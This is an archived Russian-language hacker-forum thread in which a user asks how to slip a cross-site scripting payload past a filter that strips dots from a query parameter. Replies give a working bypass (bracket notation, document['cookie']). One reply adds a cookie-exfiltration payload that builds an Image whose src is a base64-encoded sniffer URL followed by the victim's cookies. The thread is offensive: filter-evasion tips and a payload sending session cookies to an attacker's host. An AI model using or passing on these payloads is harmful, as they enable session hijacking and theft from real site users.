Просмотр полной версии : Фильтрация точки в запросе
Здравствуйте все! Можно как-то обойти фильтрацию точки в запросе?
Есть запрос
Code:
/index.php?p=">alert(document.cookie)
Но точка в document.cookie фильтруется... ( Пробовал вставлять ASCII коды точки, но фильтр и на них...
Заранее спасибо!
M_script
06.11.2015, 08:57
altai said:
↑ (https://antichat.live/posts/3911597/)
Попробуй вот так
Можете привести пример уязвимого кода, где сработает такая атака?
M_script said:
↑ (https://antichat.live/posts/3911821/)
Можете привести пример уязвимого кода, где сработает такая атака?
я не внимательно прочитал вопрос Согласен, фигню сказал
yarbabin said:
↑ (https://antichat.live/posts/3911522/)
document["cookie"]
Спасибо, так работает! А если нужно сделать так:
Code:
">
как подменять точки в строке адреса?
Ditss said:
↑ (https://antichat.live/posts/3911886/)
Спасибо, так работает! А если нужно сделать так:
Code:
">
как подменять точки в строке адреса?
(new Image())["src"]=atob("lol")+document["cookie"]
где lol - ссылка на сниффер в base64
M_script
06.11.2015, 14:49
Ditss said:
↑ (https://antichat.live/posts/3911886/)
Code:
">
Этот код не будет работать даже без фильтрации точек.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot